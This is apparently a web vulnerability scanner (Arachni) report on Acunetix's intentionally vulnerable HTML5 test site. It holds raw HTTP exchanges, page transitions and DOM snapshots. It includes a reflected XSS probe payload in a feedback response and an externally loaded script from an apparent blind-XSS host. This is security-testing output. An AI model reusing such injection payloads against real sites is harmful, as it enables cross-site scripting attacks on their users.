<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Action</li>
<li class="active"><a href="#/response">Response</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
Thank you very much for your feedback! <!-- 696a3680438a7af53a0a54d3d26469bf</textarea>--><xss_0c25785427908905790d3a663dc49fa7/><!--<textarea> -->
<link src='http://localhost/link'>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p>© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>
<script src="/static/app/app.js"></script>
</body>
</html>
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> We're glad to see New York introducing #NetNeutrality protections based on California's SB 822 <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" target="_blank" href="https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/www.eff.org" class="ng-binding" href="#/all/filter/www.eff.org" data-arachni-id="-313525244">www.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=6cc95ec82a3e1524115d692b9386d60a" href="/like?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" href="/comment?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=6cc95ec82a3e1524115d692b9386d60a" href="/report?id=6cc95ec82a3e1524115d692b9386d60a" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption" href="#/redir?url=https://www.eff.org/deeplinks/2018/05/there-no-middle-ground-encryption"><div class="detailsboxTitle ng-binding">There is No Middle Ground on Encryption</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://ssd.eff.org/en/module-categories/security-scenarios" target="_blank" href="https://ssd.eff.org/en/module-categories/security-scenarios" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/ssd.eff.org" class="ng-binding" href="#/all/filter/ssd.eff.org" data-arachni-id="-947703951">ssd.eff.org</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/like?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/comment?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" href="/report?id=89c6a73900cd1e30f3ee69a3c7d8b9b6" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios" href="#/redir?url=https://ssd.eff.org/en/module-categories/security-scenarios"><div class="detailsboxTitle ng-binding">Security Scenarios</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/EFF" target="_blank" class="ng-binding" href="http://twitter.com/EFF" data-arachni-id="1975173">@EFF</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/EFF" target="_blank" href="http://twitter.com/EFF" data-arachni-id="-1973652892"><b class="ng-binding">@EFF</b></a><br> Our Surveillance Self-Defense site has lessons for targeted groups like journalists and journalism students to be safer online without sacrificing access to information. <br><br> </div> </div> </div> </div><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" target="_blank" href="https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/blog.github.com" class="ng-binding" href="#/all/filter/blog.github.com" data-arachni-id="1782715074">blog.github.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/like?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/comment?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" href="/report?id=e2fcb75b30bd0791a1fd5bc13ca66343" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/" href="#/redir?url=https://blog.github.com/2018-05-01-github-pages-custom-domains-https/"><div class="detailsboxTitle ng-binding">Custom domains on GitHub Pages gain support for HTTPS</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a ng-href="http://twitter.com/github" target="_blank" class="ng-binding" href="http://twitter.com/github" data-arachni-id="-279974877">@github</a> </span> </div> </div> <div class="ng-binding"> <a ng-href="http://twitter.com/github" target="_blank" href="http://twitter.com/github" data-arachni-id="750470370"><b class="ng-binding">@github</b></a><br> Today, custom domains on GitHub Pages are gaining support for HTTPS via @letsencrypt. It's another step towards making the web more secure for everyone. <br><br> </div> </div> </div> </div> <ul class="pager ng-scope"> <li><a ng-href="#/popular/page/-1" ng-show="page>0" href="#/popular/page/-1" style="display: none;">Previous</a></li> <li><a ng-href="#/popular/page/1" ng-show="filter==''" href="#/popular/page/1" data-arachni-id="2424595">Next</a></li> </ul></div></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId">unknown is coming from <b>unknown</b> and has visited this page <b>1</b> times.</div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> 